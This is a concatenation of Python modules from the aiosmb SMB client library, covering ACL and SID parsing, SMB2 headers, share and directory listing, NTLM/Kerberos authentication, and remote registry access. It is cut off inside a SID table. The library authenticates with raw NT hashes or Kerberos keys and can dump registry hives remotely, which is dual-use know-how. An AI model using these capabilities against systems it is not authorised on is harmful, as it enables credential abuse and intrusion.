import io
from aiosmb.wintypes.dtyp.constrcuted_security.ace import ACEReader

class ACL:
	def __init__(self):
		self.AclRevision = None
		self.Sbz1 = None
		self.AclSize = None
		self.AceCount = None
		self.Sbz2 = None
		
		self.aces = []
		
	@staticmethod
	def from_buffer(buff):
		acl = ACL()
		acl.AclRevision = int.from_bytes(buff.read(1), 'little', signed = False)
		acl.Sbz1 = int.from_bytes(buff.read(1), 'little', signed = False)
		acl.AclSize = int.from_bytes(buff.read(2), 'little', signed = False)
		acl.AceCount = int.from_bytes(buff.read(2), 'little', signed = False)
		acl.Sbz2 = int.from_bytes(buff.read(2), 'little', signed = False)
		for _ in range(acl.AceCount):
			acl.aces.append(ACEReader.from_buffer(buff))
		return acl
		
	def __str__(self):
		t = '=== ACL ===\r\n'
		for ace in self.aces:
			t += '%s\r\n' % str(ace)
		return t


import enum
import platform

import copy
from aiosmb.commons.connection.credential import *
from aiosmb.authentication.spnego.native import SPNEGO
from aiosmb.authentication.ntlm.native import NTLMAUTHHandler, NTLMHandlerSettings
from aiosmb.authentication.kerberos.native import SMBKerberos
from minikerberos.common.target import KerberosTarget
from minikerberos.common.proxy import KerberosProxy
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.spn import KerberosSPN

from minikerberos.network.selector import KerberosClientSocketSelector


if platform.system().upper() == 'WINDOWS':
	from aiosmb.authentication.kerberos.sspi import SMBKerberosSSPI
	from aiosmb.authentication.ntlm.sspi import SMBNTLMSSPI

class AuthenticatorBuilder:
	def __init__(self):
		pass
	
	@staticmethod
	def to_spnego_cred(creds, target = None):
		if creds.authentication_type == SMBAuthProtocol.NTLM:
			ntlmcred = SMBNTLMCredential()
			ntlmcred.username = creds.username
			ntlmcred.domain = creds.domain if creds.domain is not None else ''
			ntlmcred.workstation = None
			ntlmcred.is_guest = False
			
			if creds.secret is None:
				raise Exception('NTLM authentication requres password!')
			if creds.secret_type == SMBCredentialsSecretType.NT:
				ntlmcred.nt_hash = creds.secret
			elif creds.secret_type == SMBCredentialsSecretType.PASSWORD:
				ntlmcred.password = creds.secret
			
			settings = NTLMHandlerSettings(ntlmcred)
			handler = NTLMAUTHHandler(settings)
			
			#setting up SPNEGO
			spneg = SPNEGO()
			spneg.add_auth_context('NTLMSSP - Microsoft NTLM Security Support Provider', handler)
			
			return spneg
		
		elif creds.authentication_type == SMBAuthProtocol.KERBEROS:
			if target is None:
				raise Exception('Target must be specified with Kerberos!')
				
			if target.hostname is None:
				raise Exception('target must have a domain name or hostname for kerberos!')
				
			if target.dc_ip is None:
				raise Exception('target must have a dc_ip for kerberos!')
			
			kc = KerberosCredential()
			kc.username = creds.username
			kc.domain = creds.domain
			if creds.secret_type == SMBCredentialsSecretType.PASSWORD:
				kc.password = creds.secret
			elif creds.secret_type == SMBCredentialsSecretType.NT:
				kc.nt_hash = creds.secret
				
			elif creds.secret_type == SMBCredentialsSecretType.AES:
				if len(creds.secret) == 32:
					kc.kerberos_key_aes_128 = creds.secret
				elif len(creds.secret) == 64:
					kc.kerberos_key_aes_256 = creds.secret
					
			elif creds.secret_type == SMBCredentialsSecretType.RC4:
				kc.kerberos_key_rc4 = creds.secret
			
			elif creds.secret_type == SMBCredentialsSecretType.RC4:
				kc.ccache = creds.secret
			else:
				raise Exception('No suitable secret type found to set up kerberos!')
			
				
			kcred = SMBKerberosCredential()
			kcred.ccred = kc
			kcred.spn = KerberosSPN.from_target_string(target.to_target_string())
			kcred.target = KerberosTarget(target.dc_ip)
			if target.proxy is not None:
				kcred.target.proxy = KerberosProxy()
				kcred.target.proxy.target = copy.deepcopy(target.proxy.target)
				kcred.target.proxy.target.endpoint_ip = target.dc_ip
				kcred.target.proxy.target.endpoint_port = 88
				kcred.target.proxy.creds = copy.deepcopy(target.proxy.auth)

			handler = SMBKerberos(kcred)
			
			#setting up SPNEGO
			spneg = SPNEGO()
			spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
			return spneg
			
		elif creds.authentication_type == SMBAuthProtocol.SSPI_KERBEROS:
			if target is None:
				raise Exception('Target must be specified with Kerberos SSPI!')
				
			kerbcred = SMBKerberosSSPICredential()
			kerbcred.client = None #creds.username #here we could submit the domain as well for impersonation? TODO!
			kerbcred.password = creds.secret
			kerbcred.target = target.to_target_string()
			
			handler = SMBKerberosSSPI(kerbcred)
			#setting up SPNEGO
			spneg = SPNEGO()
			spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
			return spneg
		
		elif creds.authentication_type == SMBAuthProtocol.SSPI_NTLM:
			ntlmcred = SMBNTLMSSPICredential()
			ntlmcred.client = creds.username #here we could submit the domain as well for impersonation? TODO!
			ntlmcred.password = creds.secret
			
			handler = SMBNTLMSSPI(ntlmcred)
			#setting up SPNEGO
			spneg = SPNEGO()
			spneg.add_auth_context('NTLMSSP - Microsoft NTLM Security Support Provider', handler)
			return spneg

		elif creds.authentication_type.value.startswith('MULTIPLEXOR'):
			if creds.authentication_type in [SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM, SMBAuthProtocol.MULTIPLEXOR_NTLM]:
				from aiosmb.authentication.ntlm.multiplexor import SMBNTLMMultiplexor

				ntlmcred = SMBMultiplexorCredential()
				ntlmcred.type = 'NTLM'
				if creds.username is not None:
					ntlmcred.username = '<CURRENT>'
				if creds.domain is not None:
					ntlmcred.domain = '<CURRENT>'
				if creds.secret is not None:
					ntlmcred.password = '<CURRENT>'
				ntlmcred.is_guest = False
				ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
				ntlmcred.parse_settings(creds.settings)
				
				handler = SMBNTLMMultiplexor(ntlmcred)
				#setting up SPNEGO
				spneg = SPNEGO()
				spneg.add_auth_context('NTLMSSP - Microsoft NTLM Security Support Provider', handler)
				return spneg

			elif creds.authentication_type in [SMBAuthProtocol.MULTIPLEXOR_SSL_KERBEROS, SMBAuthProtocol.MULTIPLEXOR_KERBEROS]:
				from aiosmb.authentication.kerberos.multiplexor import SMBKerberosMultiplexor

				ntlmcred = SMBMultiplexorCredential()
				ntlmcred.type = 'KERBEROS'
				ntlmcred.target = creds.target
				if creds.username is not None:
					ntlmcred.username = '<CURRENT>'
				if creds.domain is not None:
					ntlmcred.domain = '<CURRENT>'
				if creds.secret is not None:
					ntlmcred.password = '<CURRENT>'
				ntlmcred.is_guest = False
				ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
				ntlmcred.parse_settings(creds.settings)

				handler = SMBKerberosMultiplexor(ntlmcred)
				#setting up SPNEGO
				spneg = SPNEGO()
				spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
				return spneg

			
			
			
		


import enum


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/ca28ec38-f155-4768-81d6-4bfeb8586fc9
class FileAttributes(enum.IntFlag):
	FILE_ATTRIBUTE_ARCHIVE = 0x00000020 #A file or directory that requires to be archived. Applications use this attribute to mark files for backup or removal.
	FILE_ATTRIBUTE_COMPRESSED = 0x00000800 #A file or directory that is compressed. For a file, all of the data in the file is compressed. For a directory, compression is the default for newly created files and subdirectories.
	FILE_ATTRIBUTE_DIRECTORY = 0x00000010 #This item is a directory
	FILE_ATTRIBUTE_ENCRYPTED = 0x00004000 #A file or directory that is encrypted. For a file, all data streams in the file are encrypted. For a directory, encryption is the default for newly created files and subdirectories.
	FILE_ATTRIBUTE_HIDDEN = 0x00000002 #A file or directory that is hidden. Files and directories marked with this attribute do not appear in an ordinary directory listing.
	FILE_ATTRIBUTE_NORMAL = 0x00000080 #A file that does not have other attributes set. This flag is used to clear all other flags by specifying it with no other flags set. #This flag MUST be ignored if other flags are set.<147>
	FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000 #A file or directory that is not indexed by the content indexing service.
	FILE_ATTRIBUTE_OFFLINE = 0x00001000 #The data in this file is not available immediately. This attribute indicates that the file data is physically moved to offline storage. This attribute is used by Remote Storage, which is hierarchical storage management software.
	FILE_ATTRIBUTE_READONLY = 0x00000001 #A file or directory that is read-only. For a file, applications can read the file but cannot write to it or delete it. For a directory, applications cannot delete it, but applications can create and delete files from that directory.
	FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400 #A file or directory that has an associated reparse point.
	FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200 #A file that is a sparse file.
	FILE_ATTRIBUTE_SYSTEM = 0x00000004 #A file or directory that the operating system uses a part of or uses exclusively.
	FILE_ATTRIBUTE_TEMPORARY = 0x00000100 #A file that is being used for temporary storage. The operating system can choose to store this file's data in memory rather than on mass storage, writing the data to mass storage only if data remains in the file when the file is closed.
	FILE_ATTRIBUTE_INTEGRITY_STREAM = 0x00008000 #A file or directory that is configured with integrity support. For a file, all data streams in the file have integrity support. For a directory, integrity support is the default for newly created files and subdirectories, unless the caller specifies otherwise.<148>
	FILE_ATTRIBUTE_NO_SCRUB_DATA = 0x00020000 #A file or directory that is configured to be excluded from the data integrity scan. For a directory configured with FILE_ATTRIBUTE_NO_SCRUB_DATA, the default for newly created files and subdirectories is to inherit the FILE_ATTRIBUTE_NO_SCRUB_DATA attribute.<149>




from pathlib import PureWindowsPath
from aiosmb.commons.interfaces.file import SMBFile
from aiosmb.wintypes.access_mask import *
from aiosmb.wintypes.fscc.FileAttributes import FileAttributes
from aiosmb.wintypes.fscc.structures.fileinfoclass import FileInfoClass
from aiosmb.protocol.smb2.commands.query_info import SecurityInfo
from aiosmb.protocol.smb2.commands import *
		
class SMBDirectory:
	def __init__(self):
		#self.parent_share = None
		self.tree_id = None #thisdescribes the share itself, not the directory!
		self.fullpath = None
		self.unc_path = None
		self.parent_dir = None
		self.name = None
		self.creation_time = None
		self.last_access_time = None
		self.last_write_time = None
		self.change_time = None
		self.allocation_size = None
		self.attributes = None
		self.file_id = None
		self.sid = None
		
		self.files = {}
		self.subdirs = {}
	
	def get_share_path(self):
		unc = PureWindowsPath(self.unc_path)
		return unc.drive

	async def get_security_descriptor(self, connection):
		if self.sid is None:
			file_id = None
			try:
				desired_access = FileAccessMask.READ_CONTROL
				share_mode = ShareAccess.FILE_SHARE_READ
				create_options = CreateOptions.FILE_DIRECTORY_FILE | CreateOptions.FILE_SYNCHRONOUS_IO_NONALERT
				file_attrs = 0
				create_disposition = CreateDisposition.FILE_OPEN
				file_id = await connection.create(self.tree_id, self.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs)
				
				self.sid = await connection.query_info(
					self.tree_id, 
					file_id,
					info_type = QueryInfoType.SECURITY, 
					information_class = FileInfoClass.NONE, 
					additional_information = SecurityInfo.ATTRIBUTE_SECURITY_INFORMATION | SecurityInfo.DACL_SECURITY_INFORMATION | SecurityInfo.OWNER_SECURITY_INFORMATION | SecurityInfo.GROUP_SECURITY_INFORMATION, 
					flags = 0, 
				)
			except:
				raise

			finally:
				if file_id is not None:
					await connection.close(self.tree_id, file_id)


			return self.sid
	

	def get_console_output(self):
		lines = []
		for name in self.subdirs:
			directory = self.subdirs[name]
			entry = '%s\t%s\t%s\t%s' % ('drw-rw-rw-',  directory.allocation_size, directory.creation_time, directory.name)
			lines.append(entry)
		for name in self.files:
			directory = self.files[name]
			entry = '%s\t%s\t%s\t%s' % (' rw-rw-rw-',  directory.allocation_size, directory.creation_time, directory.name)
			lines.append(entry)
		return lines
		
	async def create_subdir(self, dir_name, connection):
		should_close = False #dont close the tree_id only if the directory hasnt been connected to yet
		if not self.tree_id:
			should_close = True
			tree_entry = await connection.tree_connect(self.get_share_path())
			self.tree_id = tree_entry.tree_id

		file_id = None
		newpath = dir_name
		if self.fullpath != '':
			newpath = '%s\\%s' % (self.fullpath, dir_name)
		try:
			file_id = await connection.create(
				self.tree_id, 
				newpath, 
				FileAccessMask.GENERIC_ALL, 
				ShareAccess.FILE_SHARE_READ | ShareAccess.FILE_SHARE_WRITE | ShareAccess.FILE_SHARE_DELETE,
				CreateOptions.FILE_DIRECTORY_FILE | CreateOptions.FILE_SYNCHRONOUS_IO_NONALERT, 
				CreateDisposition.FILE_CREATE, 
				0
			)
		finally:
			if file_id is not None:
				await connection.close(self.tree_id, file_id)
			if should_close is True:       
				await connection.tree_disconnect(self.tree_id)
	
	async def delete_subdir(self, dir_name):
		raise Exception('delete subdir not implemented!')

	async def list(self, connection):
		"""
		Lists all files and folders in the directory
		directory: SMBDirectory
		fills the SMBDirectory's data
		"""			
		desired_access = FileAccessMask.FILE_READ_DATA
		share_mode = ShareAccess.FILE_SHARE_READ
		create_options = CreateOptions.FILE_DIRECTORY_FILE | CreateOptions.FILE_SYNCHRONOUS_IO_NONALERT
		file_attrs = 0
		create_disposition = CreateDisposition.FILE_OPEN
		
		try:
			file_id = await connection.create(self.tree_id, self.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs)
		except Exception as e:
			print(e)
			return
		try:
			while True:
				fileinfos = await connection.query_directory(self.tree_id, file_id)
				if not fileinfos:
					break
				for info in fileinfos:
					if info.FileAttributes & FileAttributes.FILE_ATTRIBUTE_DIRECTORY:
						dirname = info.FileName 
						if info.FileName in ['.','..']:
							continue
						subdir = SMBDirectory()
						subdir.tree_id = self.tree_id
						if self.fullpath != '':
							subdir.fullpath = '%s\\%s' % (self.fullpath, info.FileName)	
						else:
							subdir.fullpath = info.FileName
						subdir.unc_path = '%s\\%s' % (self.unc_path, info.FileName)
						subdir.parent_dir = self
						subdir.name = info.FileName
						subdir.creation_time = info.CreationTime
						subdir.last_access_time = info.LastAccessTime
						subdir.last_write_time = info.LastWriteTime
						subdir.change_time = info.ChangeTime
						subdir.allocation_size = info.AllocationSize
						subdir.attributes = info.FileAttributes
						
						self.subdirs[subdir.name] = subdir
						
					else:
						file = SMBFile()
						#file.parent_share = directory.parent_share
						file.tree_id = self.tree_id
						file.parent_dir = None
						if self.fullpath != '':
							file.fullpath = '%s\\%s' % (self.fullpath, info.FileName)
							file.unc_path = '%s\\%s' % (self.unc_path, info.FileName)
						else:
							file.fullpath = info.FileName
							file.unc_path = '%s\\%s' % (self.unc_path, info.FileName)
						file.name = info.FileName
						file.size = info.EndOfFile
						file.creation_time = info.CreationTime
						file.last_access_time = info.LastAccessTime
						file.last_write_time = info.LastWriteTime
						file.change_time = info.ChangeTime
						file.allocation_size = info.AllocationSize
						file.attributes = info.FileAttributes		
						self.files[file.name] = file
		except Exception as e:
			print(e)
			return
		finally:
			if file_id is not None:
				await connection.close(self.tree_id, file_id)
		
	def __str__(self):
		import traceback
		traceback.print_stack()
		t = '===== DIRECTORY ===== \r\n'
		for k in self.__dict__:
			if k.startswith('parent_'):
				continue
			if isinstance(self.__dict__[k], list):
				for item in self.__dict__[k]:
					t += '%s : %s\r\n' % (k, item)
			elif isinstance(self.__dict__[k], dict):
				for ks in self.__dict__[k]:
					t += '%s : %s\r\n' % (ks, self.__dict__[k][ks])
			else:
				t += '%s : %s\r\n' % (k, self.__dict__[k])
		
		return t


import enum
import io

from aiosmb.protocol.smb2.commands.negotiate import SMB2CompressionType, SMB2CompressionFlags
	
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0
class SMB2Header_COMPRESSION_TRANSFORM:
	def __init__(self):
		self.ProtocolId = b'\xFCSMB'
		self.OriginalCompressedSegmentSize = None
		self.CompressionAlgorithm = None
		self.Flags = None
		self.Offset = None

	@staticmethod
	def construct(comp_data, algo, original_size, compressed_size, is_chained = False):
		comp_hdr = SMB2Header_COMPRESSION_TRANSFORM()
		comp_hdr.OriginalCompressedSegmentSize = original_size
		comp_hdr.CompressionAlgorithm = algo
		if is_chained is False:
			comp_hdr.Flags = SMB2CompressionFlags.NONE
			comp_hdr.Offset = compressed_size
		else:
			comp_hdr.Flags = SMB2CompressionFlags.CHAINED
			comp_hdr.Offset = compressed_size

		return comp_hdr
		
	def to_bytes(self):
		t = self.ProtocolId
		t += self.OriginalCompressedSegmentSize.to_bytes(4, byteorder='little', signed = False)
		t += self.CompressionAlgorithm.value.to_bytes(2, byteorder='little', signed = False)
		t += self.Flags.value.to_bytes(2, byteorder='little', signed = False)
		t += self.Offset.to_bytes(4, byteorder='little', signed = False)

		return t
		
	@staticmethod
	def from_buffer(buff):
		hdr = SMB2Header_COMPRESSION_TRANSFORM()
		hdr.ProtocolId = buff.read(4)
		assert hdr.ProtocolId == b'\xFCSMB'
		hdr.OriginalCompressedSegmentSize = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		hdr.CompressionAlgorithm = SMB2CompressionType(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		hdr.Flags  = SMB2CompressionFlags(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		hdr.Offset  = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		return hdr



import enum

class NegotiateDialects(enum.Enum):
	WILDCARD = 0x02FF
	SMB202 = 0x0202 #SMB 2.0.2 dialect revision number.
	SMB210 = 0x0210 #SMB 2.1 dialect revision number.<10>
	SMB222 = 0x0222
	SMB224 = 0x0224
	SMB300 = 0x0300 #SMB 3.0 dialect revision number. <11>
	SMB302 = 0x0302 #SMB 3.0.2 dialect revision number.<12>
	SMB310 = 0x0310 #SMB 3.1.1 dialect revision number.<13>
	SMB311 = 0x0311 #SMB 3.1.1 dialect revision number.<13>

SMB2_NEGOTIATE_DIALTECTS_2 = {
	NegotiateDialects.SMB202 : 1,
	NegotiateDialects.SMB210 : 1,
	#NegotiateDialects.SMB222 : 1,
	#NegotiateDialects.SMB224 : 1
}
SMB2_NEGOTIATE_DIALTECTS_3 = {
	NegotiateDialects.SMB300 : 1,
	NegotiateDialects.SMB302 : 1,
	#NegotiateDialects.SMB310 : 1,
	NegotiateDialects.SMB311 : 1
}
SMB2_NEGOTIATE_DIALTECTS = {
	NegotiateDialects.SMB202 : 1,
	NegotiateDialects.SMB210 : 1,
	NegotiateDialects.SMB300 : 1,
	NegotiateDialects.SMB302 : 1,
	NegotiateDialects.SMB311 : 1
}




from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.dcerpc.v5 import rrp
from aiosmb.dcerpc.v5.interfaces.servicemanager import *
from aiosmb.commons.utils.decorators import red, rr
		
class RRP:
	def __init__(self, connection):
		self.connection = connection
		self.service_manager = None
		
		self.dce = None
		self.handle = None
		
		self.hive_handles = {}
		
	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	@red
	async def connect(self, open = False):
		rpctransport = SMBDCEFactory(self.connection,  filename=r'\winreg')
		self.dce = rpctransport.get_dce_rpc()
		await rr(self.dce.connect())
		await rr(self.dce.bind(rrp.MSRPC_UUID_RRP))
	
		if open == True:
			await rr(self.open())

		return True, None
				
	@red
	async def open(self):
		if not self.dce:
			await rr(self.connect())
		
		ans, _ = await rr(rrp.hOpenLocalMachine(self.dce))
		self.handle = ans['phKey']

		return True, None
	
	@red
	async def close(self):
		if self.dce:
			if self.handle:
				for hive_name in self.hive_handles:
					try:
						await rrp.hBaseRegCloseKey(self.dce, self.hive_handles[hive_name])
					except Exception as e:
						print(e)
						pass
			
				try:
					await rrp.hBaseRegCloseKey(self.dce, self.handle)
				except Exception as e:
					print(e)
					pass
			try:
				await self.dce.disconnect()
			except Exception as e:
				print(e)
				pass
				
		if self.service_manager:
			try:
				await self.service_manager.close()
			except Exception as e:
				print(e)
				pass
				
		return True, None
			
	#@red
	#async def enable(self):
	#	self.service_manager = ServieManager(self.connection)
		
	@red
	async def open_hive(self, hive_name):
		if not self.handle:
			await self.open()
		if hive_name in self.hive_handles:
			return
			
		ans, _ = await rr(rrp.hBaseRegCreateKey(self.dce, self.handle, hive_name))
			
		self.hive_handles[hive_name] = ans['phkResult']

		return True, None
	
	@red
	async def save_hive(self, hive_name, remote_path):
		"""
		Dumps the registry five to a file !ON THE REMOTE MACHINE!
		"""
		if not self.handle:
			await rr(self.open())
		if hive_name not in self.hive_handles:
			await rr(self.open_hive(hive_name))
			
		await rr(rrp.hBaseRegSaveKey(self.dce, self.hive_handles[hive_name], remote_path))

		return True, None
	
	@red
	async def close_hive(self, hive_name):
		if not self.handle:
			await rr(self.open())
		if hive_name not in self.hive_handles:
			await rr(self.open_hive(hive_name))
		
		await rr(rrp.hBaseRegCloseKey(self.dce, self.hive_handles[hive_name]))

		return True, None


from aiosmb.commons.interfaces.directory import SMBDirectory


class SMBShare:
	def __init__(self, name = None, stype = None, remark = None, fullpath = None):
		self.fullpath = fullpath
		self.unc_path = None
		self.name = name
		self.type = stype
		self.remark = remark
		self.flags = None
		self.capabilities = None
		self.maximal_access = None
		self.tree_id = None
		
		self.files = {}
		self.subdirs = {}
	
	async def connect(self, connection):
		"""
		Connect to the share and fills connection related info in the SMBShare object
		FULLPATH MUST BE SPECIFIED ALREADY FOR THIS OBJECT!
		"""
		tree_entry = await connection.tree_connect(self.fullpath)
		self.tree_id = tree_entry.tree_id
		self.maximal_access = tree_entry.maximal_access
		self.unc_path = self.fullpath
		init_dir = SMBDirectory()
		init_dir.tree_id = self.tree_id
		init_dir.fullpath = ''
		init_dir.unc_path = self.unc_path
		#init_dir.name = ''
		self.subdirs[''] = init_dir
		
	def __str__(self):
		t = '===== SHARE =====\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for item in self.__dict__[k]:
					t += '%s : %s\r\n' % (k, item)
			elif isinstance(self.__dict__[k], dict):
				for ks in self.__dict__[k]:
					t += '%s : %s\r\n' % (ks, self.__dict__[k][ks])
			else:
				t += '%s : %s\r\n' % (k, self.__dict__[k])
		
		return t


import io

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/f992ad60-0fe4-4b87-9fed-beb478836861
class SID:
	def __init__(self):
		self.Revision = None
		self.SubAuthorityCount = None
		self.IdentifierAuthority = None
		self.SubAuthority = []
		
		self.wildcard = None #this is for well-known-sid lookups
	
	@staticmethod	
	def from_string(sid_str, wildcard = False):
		if sid_str[:4] != 'S-1-':
			raise Exception('This is not a SID')
		sid = SID()
		sid.wildcard = wildcard
		sid.Revision = 1
		sid_str = sid_str[4:]
		t = sid_str.split('-')[0]
		if t[:2] == '0x':
			sid.IdentifierAuthority = int(t[2:],16)
		else:
			sid.IdentifierAuthority = int(t)
			
		for p in sid_str.split('-')[1:]:
			try:
				p = int(p)
			except Exception as e:
				if wildcard != True:
					raise e
			sid.SubAuthority.append(p)
		return sid
		
	@staticmethod
	def from_bytes(data):
		return SID.from_buffer(io.BytesIO(data))
		
	@staticmethod
	def from_buffer(buff):
		sid = SID()
		sid.Revision = int.from_bytes(buff.read(1), 'little', signed = False)
		sid.SubAuthorityCount = int.from_bytes(buff.read(1), 'little', signed = False)
		sid.IdentifierAuthority = int.from_bytes(buff.read(6), 'big', signed = False)
		for i in range(sid.SubAuthorityCount):
			sid.SubAuthority.append(int.from_bytes(buff.read(4), 'little', signed = False))
		return sid
		
	def to_bytes(self):
		t = self.Revision.to_bytes(1, 'little')
		t += len(self.SubAuthority).to_bytes(1, 'little')
		t += self.IdentifierAuthority.to_bytes(6, 'big')
		for i in self.SubAuthority:
			t += i.to_bytes((i.bit_length() + 7) // 8, 'little')
		return t
		
	def __str__(self):
		t = 'S-1-'
		if self.IdentifierAuthority < 2**32:
			t += str(self.IdentifierAuthority)
		else:
			t += '0x' + self.IdentifierAuthority.to_bytes(6, 'big').hex().upper().rjust(12, '0')
		for i in self.SubAuthority:
			t += '-' + str(i)
		return t

well_known_sids = {
	'NULL' : SID.from_string('S-1-0-0', True),
	'EVERYONE' : SID.from_string('S-1-1-0', True),
	'LOCAL' : SID.from_string('S-1-2-0', True),
	'CONSOLE_LOGON' : SID.from_string('S-1-2-1', True),
	'CREATOR_OWNER' : SID.from_string('S-1-3-0', True),
	'CREATOR_GROUP' : SID.from_string('S-1-3-1', True),
	'OWNER_SERVER' : SID.from_string('S-1-3-2', True),
	'GROUP_SERVER' : SID.from_string('S-1-3-3', True),
	'OWNER_RIGHTS' : SID.from_string('S-1-3-4', True),
	'NT_AUTHORITY' : SID.from_string('S-1-5', True),
	'DIALUP' : SID.from_string('S-1-5-1', True),
	'NETWORK' : SID.from_string('S-1-5-2', True),
	'BATCH' : SID.from_string('S-1-5-3', True),
	'INTERACTIVE' : SID.from_string('S-1-5-4', True),
	'LOGON_ID' : SID.from_string('S-1-5-5-x-y', True),
	'SERVICE' : SID.from_string('S-1-5-6', True),
	'ANONYMOUS' : SID.from_string('S-1-5-7', True),
	'PROXY' : SID.from_string('S-1-5-8', True),
	'ENTERPRISE_DOMAIN_CONTROLLERS' : SID.from_string('S-1-5-9', True),
	'PRINCIPAL_SELF' : SID.from_string('S-1-5-10', True),
	'AUTHENTICATED_USERS' : SID.from_string('S-1-5-11', True),
	'RESTRICTED_CODE' : SID.from_string('S-1-5-12', True),
	'TERMINAL_SERVER_USER' : SID.from_string('S-1-5-13', True),
	'REMOTE_INTERACTIVE_LOGON' : SID.from_string('S-1-5-14', True),
	'THIS_ORGANIZATION' : SID.from_string('S-1-5-15', True),
	'IUSR' : SID.from_string('S-1-5-17', True),
	'LOCAL_SYSTEM' : SID.from_string('S-1-5-18', True),
	'LOCAL_SERVICE' : SID.from_string('S-1-5-19', True),
	'NETWORK_SERVICE' : SID.from_string('S-1-5-20', True),
	'ENTERPRISE_READONLY_DOMAIN_CONTROLLERS' : SID.from_string('S-1-5-21-<root domain>-498', True),
	'COMPOUNDED_AUTHENTICATION' : SID.from_string('S-1-5-21-0-0-0-496', True),
	'CLAIMS_VALID' : SID.from_string('S-1-5-21-0-0-0-497', True),
	'ADMINISTRATOR' : SID.from_string('S-1-5-21-<machine>-500', True),
	'GUEST' : SID.from_string('S-1-5-21-<machine>-501', True),
	'KRBTG' : SID.from_string('S-1-5-21-<domain>-502', True),
	'DOMAIN_ADMINS' : SID.from_string('S-1-5-21-<domain>-512', True),
	'DOMAIN_USERS' : SID.from_string('S-1-5-21-<domain>-513', True),
	'DOMAIN_GUESTS' : SID.from_string('S-1-5-21-<domain>-514', True),
	'DOMAIN_COMPUTERS' : SID.from_string('S-1-5-21-<domain>-515', True),
	'DOMAIN_DOMAIN_CONTROLLERS' : SID.from_string('S-1-5-21-<domain>-516', True),
	'CERT_PUBLISHERS' : SID.from_string('S-1-5-21-<domain>-517', True),
	'SCHEMA_ADMINISTRATORS' : SID.from_string('S-1-5-21-<root-domain>-518', True),
	'ENTERPRISE_ADMINS' : SID.from_string('S-1-5-21-<root-domain>-519', True),
	'GROUP_POLICY_CREATOR_OWNERS' : SID.from_string('S-1-5-21-<domain>-520', True),
	'READONLY_DOMAIN_CONTROLLERS' : SID.from_string('S-1-5-21-<domain>-521', True),
	'CLONEABLE_CONTROLLERS' : SID.from_string('S-1-5-21-<domain>-522', True),
	'PROTECTED_USERS' : SID.from_string('S-1-5-21-<domain>-525', True),
	'KEY_ADMINS' : SID.from_string('S-1-5-21-<domain>-526', True),
	'ENTERPRISE_KEY_ADMINS' : SID.from_string('S-1-5-21-<domain>-527', True),
	'RAS_SERVERS' : SID.from_string('S-1-5-21-<domain>-553', True),
	'ALLOWED_RODC_PASSWORD_REPLICATION_GROUP' : SID.from_string('S-1-5-21-<domain>-571', True),
	'DENIED_RODC_PASSWORD_REPLICATION_GROUP' : SID.from_string('S-1-5-21-<domain>-572', True),
	'BUILTIN_ADMINISTRATORS' : SID.from_string('S-1-5-32-544', True),
	'BUILTIN_USERS' : SID.from_string('S-1-5-32-545', True),
	'BUILTIN_GUESTS' : SID.from_string('S-1-5-32-546', True),
	'POWER_USERS' : SID.from_string('S-1-5-32-547', True),
	'ACCOUNT_OPERATORS' : SID.from_string('S-1-5-32-548', True),
	'SERVER_OPERATORS' : SID.from_string('S-1-5-32-549', True),
	'PRINTER_OPERATORS' : SID.from_string('S-1-5-32-550', True),
	'BACKUP_OPERATORS' : SID.from_string('S-1-5-32-551', True),
	'REPLICATOR' : SID.from_string('S-1-5-32-552', True),
	'ALIAS_PREW2KCOMPACC' : SID.from_string('S-1-5-32-554', True),
	'REMOTE_DESKTOP' : SID.from_string('S-1-5-32-555', True),
	'NETWORK_CONFIGURATION_OPS' : SID.from_string('S-1-5-32-556', True),
	'INCOMING_FOREST_TRUST_BUILDERS' : SID.from_string('S-1-5-32-557', True),
	'PERFMON_USERS' : SID.from_string('S-1-5-32-558', True),
	'PERFLOG_USERS' : SID.from_string('S-1-5-32-559', True),
	'WINDOWS_AUTHORIZATION_ACCESS_GROUP' : SID.from_string('S-1-5-32-560', True),
	'TERMINAL_SERVER_LICENSE_SERVERS' : SID.from_string('S-1-5-32-561', True),
	'DISTRIBUTED_COM_USERS' : SID.from_string('S-1-5-32-562', True),
	'IIS_IUSRS' : SID.from_string('S-1-5-32-568', True),
	'CRYPTOGRAPHIC_OPERATORS' : SID.from_string('S-1-5-32-569', True),
	'EVENT_LOG_READERS' : SID.from_string('S-1-5-32-573', True),
	'CERTIFICATE_SERVICE_DCOM_ACCESS' : SID.from_string('S-1-5-32-574', True),
	'RDS_REMOTE_ACCESS_SERVERS' : SID.from_string('S-1-5-32-575', True),
	'RDS_ENDPOINT_SERVERS' : SID.from_string('S-1-5-32-576', True),
	'RDS_MANAGEMENT_SERVERS' : SID.from_string('S-1-5-32-577', True),
	'HYPER_V_ADMINS' : SID.from_string('S-1-5-32-578', True),
	'ACCESS_CONTROL_ASSISTANCE_OPS' : SID.from_string('S-1-5-32-579', True),
	'REMOTE_MANAGEMENT_USERS' : SID.from_string('S-1-5-32-580', True),
	'WRITE_RESTRICTED_CODE' : SID.from_string('S-1-5-33', True),
	'NTLM_AUTHENTICATION' : SID.from_string('S-1-5-64-10', True),
